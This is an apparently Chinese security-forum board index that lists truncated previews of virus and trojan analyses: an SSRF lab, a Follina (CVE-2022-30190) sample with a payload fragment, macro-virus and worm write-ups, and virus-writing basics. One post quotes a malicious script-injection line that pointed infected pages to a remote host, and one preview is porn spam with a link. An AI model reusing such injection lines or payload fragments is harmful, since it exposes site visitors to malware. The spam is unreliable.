木马病毒分析
本节主要介绍网络病毒和木马的特点,并对这些对象进行拆解、分析和介绍。木马病毒具有很强的隐蔽性,可以根据黑客的意图突然发动攻击。
497个主题在此版块
-
- 0 篇回复
- 2k 次查看
SSRF 以前没有单独总结过相关的姿势点,去年的时候国光就已经写了一大半了,但是后面由于经常赶项目的原因,所以这篇文章就拖延到今天才发布,感觉这个版本还是比较完善的(实际上还有几个坑没有填 但是搞这么细有啥意义呢,真正的内网当中 SSRF 打穿还是很有难度的)。 靶场拓扑设计 首先来看下本次靶场的设计拓扑图: 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 本场景基本上覆盖了 SSRF 常见的攻击场景,实际上 SSRF 还可以攻击 FTP、Zabbix、Memcached 等应用,由于时间和精力有限,先挖个坑,以后有机会的话再补充完善这套 SSRF 攻击场景的。 x.x.x.x:8080 - 判断 SSRF 是否存在 能够对外发起网络请求的地方,就可能存在 SSRF。首先看下目标站点的功能,获取站点快照: 先尝试获取外网 URL 试试看,测试一下经典的 百度 robots.txt: 测试成功,网站请求了 Baidu 的 robots.txt 文件了,并将请求页面的内容回显到了网站前端中。那么接下来尝试获取内网 URL 看看,测试请求 127.0.0.1 看看会有什么反应: 测试依然成功,网站请求了 127.0.0.1 …
HACK1949的最后回复, -
- 0 篇回复
- 502 次查看
近期新爆出的漏洞office的day,利用msdt+远程加载 CVE:CVE-2022-30190 样本地址:https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/# 简单分析 无VBA,远程加载 doc改名zip解压,搜索远程加载的地址定位到word_rels\document.xml.rels 通过查看app.any.run沙箱捕获的请求地址内容,查看如下 中间的内容是一段powershell,解码后如下 <!doctype html> <html lang="en"> <body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…
HACK1949的最后回复, -
- 0 篇回复
- 456 次查看
前言 最近打了两个项目,大多数笔记都更新在星球了。想起来,很久没写博客了,更新一下 最近研究了一下C#的syscall,记录一下 系统调用 抄来的介绍 在Windows中,进程架构分为两种处理器访问模式——用户模式和内核模式。这些模式的实现背后的想法是保护用户应用程序不访问和修改任何关键的操作系统数据。Chrome、Word 等用户应用程序都运行在用户模式下,而操作系统代码(如系统服务和设备驱动程序)都运行在内核模式下。 内核模式特指处理器中的一种执行模式,它授予对所有系统内存和所有 CPU 指令的访问权限。一些 x86 和 x64处理器通过使用另一个称为环级别的术语来区分这些模式。利用环级别特权模式的处理器定义了四个特权级别 - 其他称为环- 以保护系统代码和数据。这些振铃级别的示例如下所示。 在 Windows 中,Windows 仅使用其中两个环 - 内核模式的环 0 和用户模式的环 3。现在,在正常的处理器操作期间,处理器将根据处理器上运行的代码类型在这两种模式之间切换。那么,这种“环级”安全性背后的原因是什么?那么,当您启动用户模式应用程序时,Windows 将为该应用程序创建一个新进程,并为该应用程序提供一个私有虚拟地址空间和一个私有句柄表。 这个“句柄表”是一个包含句柄的内核对象。句柄只是对特定系统资源的抽象引用值,例如内存区域或位置、打开的…
HACK1949的最后回复, -
- 0 篇回复
- 181 次查看
College Girls Porn Pics http://footballmatchquotes.petitesemiformaldresses.amandahot.com/?erin swedish fetish porn texae laws porn 10 best free porn bros low quality porn video porn fidelity brooke
sofials18的最后回复, -
(转:红黑联盟) ANI病毒是一种蠕虫病毒,在Windows 2000/XP/2003/Vista平台运行,修改注册表,实现开机自启动,双击盘符可激活并造成再次感染。 基本信息 中文名称 ANI病毒 外文名称 Exploit.ANIfile 病毒类型 蠕虫 危险级别 ★★ 影响平台 Windows 2000/XP/2003/Vista 运行方式 自我复制到系统目录下 危害方式 修改注册表,实现开机自启动 激活方法 双击盘符可激活并造成再次感染 ANI病毒 病毒名称:Exploit.ANIfile 病毒中文名:ANI病毒 病毒类型:蠕虫 危险级别:★★ 影响平台:Windows 2000/XP/2003/Vista 描述:以Exploit.ANIfile.b为例,"ANI毒"变种b是一个利用微软Windows系统ANI文件处理漏洞(MS07-017)进行传播…
flower X的最后回复, -
- 0 篇回复
- 273 次查看
近日疯狂传播的“手机骷髅”病毒使得人们又开始关注手机系统的安全性。据以往大家所了解到的情况,手机病毒目前还未呈现大规模爆发的情况,所以人们对手机病毒的危害警惕性不高,安装手机反病毒软件的用户也不多。但是,这次的“手机骷髅”病毒似乎改变了这一现状。 首先,这种“手机骷髅”病毒是一种什么类型的威胁呢?根据卡巴斯基实验室的安全专家分析认为,“手机骷髅”病毒其实是一种针对塞班 S60系统的蠕虫程序(Worm.SymbOS.Yxe)的新变种(Worm.SymbOS.Yxe.e),主要攻击目标就是采用此类系统的智能手机。卡巴斯基早在一年前就发现了此蠕虫的第一个样本,此蠕虫还是塞班系统下第一个具有数字签名的恶意程序。此蠕虫最新变种可以通过彩信将包含自身的链接发送给其他手机用户,彩信中还会附上一个骷髅标志的图片,如果用户点击了其中的链接,并且下载和运行了其中的内容,就会造成蠕虫感染。感染手机后,蠕虫会自动收集手机上的数据,包括机器型号、IMEI码以及其他私人信息,并将这些信息发送到远程服务器。此外,“手机骷髅”蠕虫还会自动连接某个社交网络,伺机诱使更多用户感染。除了上述功能,该蠕虫还会终止手机上安装的程序管理器,使得用户很难终止或清理此恶意程序。 对于已经感染此蠕虫的手机,我们建议安装卡巴斯基手机安全软件后对手机进行扫描,清除蠕虫。这样可以免去重置系统造成的数据丢失。此外,手机用户也应该加强安全警惕性,不要轻易打开来历不明的链接,以免被恶意程序感染。 这次“手机骷髅”病毒的爆发,使得我们不得不重新审视目前手机系统所面临的威胁状况,从而及时采取应对措…
RenX6的最后回复, -
- 0 篇回复
- 188 次查看
针对WannaCrypt勒索病毒的讨论和技术文章是铺天盖地,大量的技术流派,安全厂家等纷纷献计献策,有安全厂家开发各种安全工具,对安全生态来说是一个好事,但对个人未必就是好事,我们国家很多用户是普通用户是安全小白,如果遭遇WannaCrypt勒索软件,我们该怎么办? 作者:simeon来源:51CTO.com|2017-05-14 23:03 收藏 分享 【51CTO.com原创稿件】针对WannaCrypt勒索病毒的讨论和技术文章是铺天盖地,大量的技术流派,安全厂家等纷纷献计献策,有安全厂家开发各种安全工具,对安全生态来说是一个好事,但对个人未必就是好事,我们国家很多用户是普通用户是安全小白,如果遭遇WannaCrypt勒索软件,我们该怎么办?是主动积极应对,还是被动等待被病毒感染,这完全取决于您个人选择,笔者战斗在病毒对抗的第一线,将一些经验跟大家分享,希望能对您有所帮助!本文收集了windowsxp-windows2012所有的补丁程序以及360等安全公司的安全工具程序供大家下载,下载地址:http://pan.baidu.com/s/1boBiHNx 一.病毒危害 1.1病毒感染的条件 到互联网上乃至技术专家都认为WannaCrypt攻击源头来自于MS17-010漏洞,在现实中很多被感染网络是内网,mssecsvc.exe病毒文件大小只有3M多,其后续加密生成有多个文件,这些文件是从哪里来,内网是跟外网隔离的!笔者整理认为病毒感染是有条件的: 1.Windows7以上操作系统感染几率较高 2.在感染的网络上,如果…
HACK7YD的最后回复, -
- 0 篇回复
- 155 次查看
服务器中毒了,所有的HTM/ASPX/ASP等文件,都加了一段恶意代码在最后,类似于: <script src=http://贱人网站/images/images/1.css></script> 在网站目录下面用文本替换软件狂杀了一通,全部扫干净了,BS系统也没有出现中毒代码了~ 可是当我访问ASMX的时候,出事了,在VS里面添加ASMX,因为JS病毒阻碍了VS内嵌IE加载ASMX文件分析,所以无法添加这个WEB SERVICE。用FLASHGET下载一看,得,病毒代码就在里面。 可众所周知,ASMX文件里面就一行: <%@ WebService Language="vb" Codebehind="什么什么Service.asmx.vb" Class="什么什么Service" %> 并没有病毒代码。而这现在的病毒都很懒,总不至于侵入我的.net 1.1的DLL来输出病毒代码吧?咋办涅?看来得从ASMX文件的生成过程入手。 可GOOGLE了半天,并没有很详细的中文资料,MSDN貌似也没有详细解释ASMX页面的生成,去K英文的资料慢慢摸索吧,又太慢了。 恰好这个时候,在浏览器里面输网址的时候,打错了一个字母,出了个404错误页面……奇怪了,怎么好像IE在加载病毒代码?恍然大悟,IIS里面不是针对所有的错误都有自定义错误页面吗?马上到IIS的设置一看,果然,在C:\windows\help\iishelp\common里面。看来病毒应该是感染了C盘的文件,而ASMX的渲染(Render)又使用…
cnhackteam7的最后回复, -
- 0 篇回复
- 135 次查看
在06年9月上旬开始半个月时间内,公司首次感染了比较严重的病毒:Viking.公司整个LAN近于瘫痪.公司只有我一个IT,可见有多忙了.刚上班的上午,本以为是像日常软件故障,重新安装下软件便可解决问题了。 但是,发现问题越来越严重了.不光修复后的软件又重新被viking感染,整个lan内的大部分机器出现了这个问题.看来问题不妙. 解决问题,总要有个策略的,分析出现的问题原因,第一时间找到问题的解决办法才是重要的. ======================= 最后忙了半个月,才算把公司LAN内的病毒彻底清楚了,对网络安全课程又上了一课.对网络安全以后会更加重视,及知道了基本的防范措施、解决办法。 这两天07年1月17日病毒再次爆发,而且比上次更厉害,viking 的变种。而且这段时间有“熊猫烧香”病毒,这种病毒专破坏可执行文件,而且LAN内传播的速度机器的快,通过网络共享传播。 经过一天一夜的奋战,终于把公司所有的电脑给杀了一便,问题基本已经解决。不知下次的病毒攻击将是什么时候.......网络安全,时刻警惕!
Tenfk的最后回复, -
.thumb.jpg.26764a69083eb4469b6d18365588b559.jpg)
- 0 篇回复
- 138 次查看
关于Jmail的安装和配置的内容,这里有参考资料,我就不详细描述了. 配置好一切后,试图通过调用该存储过程发送一封邮件给管理员.但是查询分析器返回的结果是 错误源: jmail.Message 错误描述: The message was undeliverable. All servers failed to receive the message 或者是收不到邮件 首先怀疑是安全性问题引起的,对JMAIL.DLL文件的权限进行了设置 在那搞半天也没找出个所以然来 幸亏好友nine一语道破天机 说是否防火墙或杀毒软件引起的 一看丫的乖乖 还真是 先关闭防火墙,问题依旧 再尝试关闭防病毒系统Mcafee VirusScan Enterprise V8.5i,这次终于正常了,但关闭防病毒系统也不是个办法啊。 继续排除问题,在访问保护中发现“禁止群发蠕虫病毒发送邮件”这一项,测试确定是因为这个端口阻拦在作怪。 解决方法: 控制台→访问保护→禁止大量发送邮件的蠕虫病毒发送邮件→已排除进程→加入你运行程序的进程名(一般就是.exe文件的文件名, 这里每个进程名都是由逗号隔开的)。 注意:如何获取进程名,你可以先发一封邮件,然再在查看其日志"防病毒标准保护:禁止群发邮件蠕虫发送邮件"这个的进程名。 当然,以上只是一个样例,并非所有问题这是因此而起。 你可以查看是否是防火墙或防病毒或权限原因,如果不是那就比较麻烦了。
尖REN的最后回复, -
- 0 篇回复
- 127 次查看
软件描述: 矩阵安全系统是用易语言打造的集进程检查 文件监视 杀毒查毒功能与一体的反病毒防病毒软件 在未来版本中将加入系统影子模式 更能有效的防止病毒木马的破坏 软件各功能描述: 杀毒查毒用检查MD5查毒方式 虽然是老方法 但经过改进 查毒机能已经能查杀毒大量的病毒和木马变种 病毒库有待更新。。 进程检查采用进程联网分析 使用超级兔子的进程上报网站 拥有最全的恶意进程名单 并能发现隐藏进程 及时强制清除 文件监视采用文件对比监视技术 能有效的监视文件的动向 使病毒木马无法隐藏 本版本为试用版 有任何BUG请及时告诉我们 我们将在最快时间内改进 谢谢! 颠覆传统?老套路? MD5追杀? MD5查杀新思路 速度和准确度完全达另一种境界。 谁说中国人的语言做不出好软件了? 矩阵软件地址:http://matrix.uu1001.com/ 软件下载地址:http://www.namipan.com/d/ac6c7f6829df93339710b18cc05396f6df9f6ad1138b1800
Xiao7的最后回复, -
- 0 篇回复
- 178 次查看
本报讯 近日,“中国第一车模兽兽”爆出的不良视频在网上大量传播,已被黑客用来散布病毒。 瑞星“云安全”系统的监测数据显示,很多用户通过QQ、MSN传播的“兽兽视频、兽兽视频全集.EXE”含有病毒,或者本身就是病毒,还有的黑客会主动散播含毒的“兽兽视频下载网址”,用户中毒后会被窃取网游账号、QQ密码等资料,目前预计受害网民已超过10万。 瑞星安全专家分析指出,黑客们利用“兽兽门”传毒的途径主要有三种,分别是:利用搜索引擎SEO技术,使带毒网站在百度、google中的排名很高,当用户出于好奇搜索“兽兽”时,即被引导到带毒网站;在“兽兽视频”中捆绑入病毒;在一些论坛或贴吧中,含有大量具有吸引力的恶意网址链接。
剑道尘心的最后回复, -
- 0 篇回复
- 187 次查看
恶意木马病毒横行,您的钱包还hold得住吗?猎豹移动安全实验室与安天AVL移动安全团队于2015年下半年,共同截获一款名为Client的木马病毒,并且对该病毒进行持续监测。通过进一步关注,我们发现该病毒在2016年1月呈爆发式增长,病毒样本量以及传播范围迅速扩大。截止到目前,仅猎豹移动安全实验室与安天AVL移动安全团队监控到的该病毒样本量已达8万多个,累计感染全国超过7万的用户终端设备! 一、Client病毒发展态势分析 1.1国内感染量超7万(每日活跃设备量),且仍在增长。 1.2 感染范围遍布全国,集中于沿海地区,如山东,浙江,广东等地。 1.3 Android4.4用户受灾最严重 感染Client病毒最多的设备系统版本为安卓4.4,占总感染量的70%以上,部分5.0系统也受到影响,但占比不到1%。 1.4 以色情视频软件传播为主 该病毒主要通过色情视频软件传播,诱惑用户下载安装。猎豹移动安全实验室与安天AVL移动安全团队监测发现,多家广告平台都对带有病毒的色情视频软件进行推广。 二、Client病毒三宗罪 2.1 暗自扣费 通过对该病毒的一系列分析, 猎豹移动安全实验室与安天AVL移动安全团队发现,该病毒会在用户的手机后台偷偷发送增值业务订购短信,并拦截扣费短信回执,给用户造成金钱损失,同时用户无法知晓自己的手机已被恶意扣费! 2.2 频弹广告并强制安装 Client病毒会在被感染的手机中加载大量恶意软件推广广告,…
KaiWn的最后回复, -
- 0 篇回复
- 148 次查看
大家好,这里为大家提供的是我的原创视频教程,内容以计算机安全为主,视频内容为不定期更新,希望大家喜欢 看雪学院:《恶意程序分析与高级对抗技术》 【吾爱动画大赛2016参赛作品】- JS下载者脚本木马的分析与防御 简介:本视频是我参加2016年吾爱动画大赛的参赛作品,为大家简单讲解了一下JavaScript下载者木马的分析与防御技术,内容包括JS的基本免杀技术、JS木马的特征码提取、启发查杀以及主动防御技术,算是一次科普,希望大家喜欢。本视频最终也是获得了该届比赛的第二名。迟些我会再完善一下视频内容,加入一些高级技术,重新录制,来给大家完整呈现JS下载者脚本木马的分析与防御技术。 视频录制时间:2016.10.06 参赛原始帖子网址:http://www.52pojie.cn/thread-542959-1-1.html 百度云盘下载地址:https://pan.baidu.com/s/1c2fwTBq 密码: yuhb 视频解压密码:www.52pojie.cn 压缩包内容: JS下载者脚本木马的分析与防御.exe —— 视频教程 JS下载者脚本木马的分析与防御.pdf —— 视频配套讲稿 病毒样本 | —— Trojan —— 教程中用到的木马样本 | —— Trojan_Modify —— 经过简单免杀修改后的木马样本 | —— Troja…
CHQ1d的最后回复, -
- 0 篇回复
- 265 次查看
[摘要]在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现. [Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0. 一、什么是病毒 恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是很重要的. 我们要对付病毒,就要了解病毒. 写一些病毒是一个很好的办法. 如果要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的: “……一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“ 其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。 要编制一个病毒,首先要知道病毒的运行机理。 不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。 在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本 原因。我们可以用一段类C伪码来表示这个过程。 [c-sharp] view plaincopyprint? InfectSection() { if (infectable_object_found &&object_not_alread…
Anonymous的最后回复, -
.thumb.jpg.efe932f5496dec4b6be0a5bdbb70a948.jpg)
- 0 篇回复
- 144 次查看
创建时间:2003-10-02 文章属性:转载 文章提交:NJUE (admin_at_ourmm.com) 本文将对当今先进的病毒/反病毒技术做全面而细致的介绍,重点当然放在了反病毒上,特别是虚拟机和实时监控技术。文中首先介绍几种当今较为流行的病毒技术,包括获取系统核心态特权级,驻留,截获系统操作,变形和加密等。然后分五节详细讨论虚拟机技术:第一节简单介绍一下虚拟机的概论;第二节介绍加密变形病毒,作者会分析两个著名变形病毒的解密子;第三节是虚拟机实现技术详解,其中会对两种不同方案进行比较,同时将剖析一个查毒用虚拟机的总体控制结构;第四节主要是对特定指令处理函数的分析;最后在第五节中列出了一些反虚拟执行技术做为今后改进的参照。论文的第三章主要介绍实时监控技术,由于win9x和winnt/2000系统机制和驱动模型不同,所以会分成两个操作系统进行讨论。其中涉及的技术很广泛:包括驱动编程技术,文件钩挂,特权级间通信等等。本文介绍的技术涉及操作系统底层机制,难度较大。所提供的代码,包括一个虚拟机C语言源代码和两个病毒实时监控驱动程序反汇编代码,具有一定的研究和实用价值。 关键字:病毒,虚拟机,实时监控 文档内容目录 1.绪 论 1. 1课题背景 1.2当今病毒技术的发展状况 1.2.1系统核心态病毒 1.2.2驻留病毒 1.2.3截获系统操作 1.2.4加密变形病毒 1.2.5反跟踪/反虚拟执行病毒 1.2.6直接API调用 1.2.7病毒隐藏 1.2.8病毒特殊感染法 2.虚拟机查毒 2.1虚拟机概论 2. 2加…
XenoG的最后回复, -
- 0 篇回复
- 161 次查看
把病毒特征嫁接到营销中,在我个人认为是一种破坏性和杀伤力极强的一种营销方式。因为它在市场中具备了市场空隙发现准、市场开拓及进攻性强、抗风险能力强、颠覆性及感染力强,市场反映速度快、渠道网络建设和传播速度快的准、强、快特征。 2006年12月初,我接到以前工作单位++购物中心数据中心一位同事的电话。电话里他急切说数据中收的计算机感染了病毒,整个企业系统十分不稳定,希望我能帮一下。 匆忙赶到打开计算机让我有点吃惊的是计算机所有exe可执行文件全部变成了焚香熊猫的图标。因为以前处理过一些病毒,我立刻从别的机器下载拷贝了一些杀毒软件进行查杀。查得比较迅速,杀得也比较彻底。但出乎意料的是查杀后的计算机重启以后如同安装还原精灵一样又恢复了原样。反复几次也无济于事。收银台的工作人员不断反映收银机不断出现死机和也出现了焚香熊猫的图标。不由得头上冒了汗。我立刻打开别的机子进行搜索查询,这才知道这就是不久以后所有网民谈“熊猫”色变的“熊猫烧香”病毒。 令人很遗憾的是没有专杀工具,相应的几款也是治标不治本。整整一个上午没有丝毫的进展。无奈之下只好建议饭后再想办法了。再急也是没有用的,更何况我也是只懂一点小伎俩的门外汉。 午饭过后,我立刻对所有反病毒的官方网站进行浏览。不幸中的万幸,在金山和江民网站分别找到了类似的变种专杀工具。立刻拷贝下来安装到了数据计算机上先用金山查杀,再动行江民复查一遍。结果太令人激动了,一次性全部处理的干干净净,数据完好无损…… 因为这一次我格外关注“熊猫烧香”病毒的最新情况,结果发现我国有相当一部分数量的计…
风尘剑心的最后回复, -
前序: 国内杀毒软件的发展史大体经过五个阶段:1)1989-90年代中期简单特征码杀毒引擎;2)90年代中期-1998年广谱特征码技术;3)1998-2007年启发式杀毒引擎;4)2008-2010年云查杀引擎;5)2010-至今人工智能杀毒引擎。 1)1989-90年代中期简单特征码杀毒引擎 第一代反病毒引擎-检验法,只能判断系统是否被病毒感染,通常是比对恶意文件的哈希值,但不具备病毒清除能力。检验法产生了真正的反病毒技术王者-特征码技术,特征码技术至今仍是反病毒软件的主要技术。 2)90年代中期-1998年广谱特征码技术 广谱特征码技术是江民公司首创,江民也是依靠该技术名震一时。广谱特征码是一类病毒程序中通用的特征字符串,起初广谱特征码技术可以有效查杀一类病毒包括变形病毒,但是随着正规应用的发展已经新病毒的不断出现,该技术误报率大大增多,已不能有效查杀新病毒。 3)1998-2007年启发式杀毒引擎 特征码技术的病毒比对、实时查杀能力至今仍是杀毒引擎赖以存活的基本能力。其缺陷是特征码要读进内存,且只能查杀已知病毒,缺乏对未知病毒处置能力,病毒变种呈指数级增长,促使需要新的检测技术出现,因此基于行为(动态分析)、文件结构分析(静态分析)、较少依赖特征库的查杀未知木马病毒的新技术-启发式杀毒引擎应运而生。启发式监测是总结病毒入侵主机后的一系列共性行为为恶意行为。 在2007年,瑞星指出黑客利用加壳等技术“产业化、自动化生产病毒”;金山指出病毒/木马高速出新,病毒“工业化”入侵特征明显;江民指出病毒开始可以隐藏自身,以逃避…
轩辕三官的最后回复, -
- 0 篇回复
- 122 次查看
病毒侵袭持续中 Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others) Total Submission(s): 16101 Accepted Submission(s): 5463 Problem Description 小t非常感谢大家帮忙解决了他的上一个问题。然而病毒侵袭持续中。在小t的不懈努力下,他发现了网路中的“万恶之源”。这是一个庞大的病毒网站,他有着好多好多的病毒,但是这个网站包含的病毒很奇怪,这些病毒的特征码很短,而且只包含“英文大写字符”。当然小t好想好想为民除害,但是小t从来不打没有准备的战争。知己知彼,百战不殆,小t首先要做的是知道这个病毒网站特征:包含多少不同的病毒,每种病毒出现了多少次。大家能再帮帮他吗? Input 第一行,一个整数N(1<=N<=1000),表示病毒特征码的个数。 接下来N行,每行表示一个病毒特征码,特征码字符串长度在1—50之间,并且只包含“英文大写字符”。任意两个病毒特征码,不会完全相同。 在这之后一行,表示“万恶之源”网站源码,源码字符串长度在2000000之内。字符串中字符都是ASCII码可见字符(不包括回车)。 Output 按以下格式每行一个,输出每个病毒出现次数。未出现的病毒不需要输出。 病毒特征码: 出现次数 冒号后有一个空格,按病毒特征码的输入顺序进行输出。 Sample Input 3 AA BB CC o…
RenX6的最后回复, -
- 0 篇回复
- 182 次查看
本文作者:i春秋作家——icq5f7a075d 宏病毒专辑:https://bbs.ichunqiu.com/forum.php?mod=collection&action=view&ctid=133 3. 宏病毒实例分析 3.1 实例1 接下来,我将以demo2.doc为例,实例分析宏病毒,demo2是一个真实的宏病毒,请在虚拟机中分析。 打开demo2.doc,发现弹出了“安全警告”,文本中内容提示用户要点击“启用内容”才能看到文件内容,实际上这里是社会工程学攻击,用户单击“启用内容”就会运行宏,并感染病毒: ALT+F11打开VBA编辑器,查看宏代码。但是你会发现,此时工程里没有数据,这是因为我们没有单击“启用内容”,VBA工程还没有加载。 单击“启用内容”,这个时候宏就已经运行了,再次查看VBA编辑器,弹出了要求输入密码的对话框。除了输入密码,我们不能看到其他信息,看来这段宏被加密了,接下来我们就要祭出神器VBA_Password_Bypasser进行解密了。 关闭demo2.doc ,使用VBA_Password_Bypasser重新打开demo2.doc,再次打开VBA编辑器查看宏代码,宏代码一览无余: 这段宏首先拼接了一段字符串CGJKIYRSDGHJHGFFG,这段字符串是一段命令,接下来就调用Shell() ,执行这段命令。 但是CGJKIYRSDGHJHGFFG的内容经过混淆,我们没办法一眼看出执行了什么命令,我们可以改造宏代码,使用Msgbox将CGJK…
HACK7YD的最后回复,
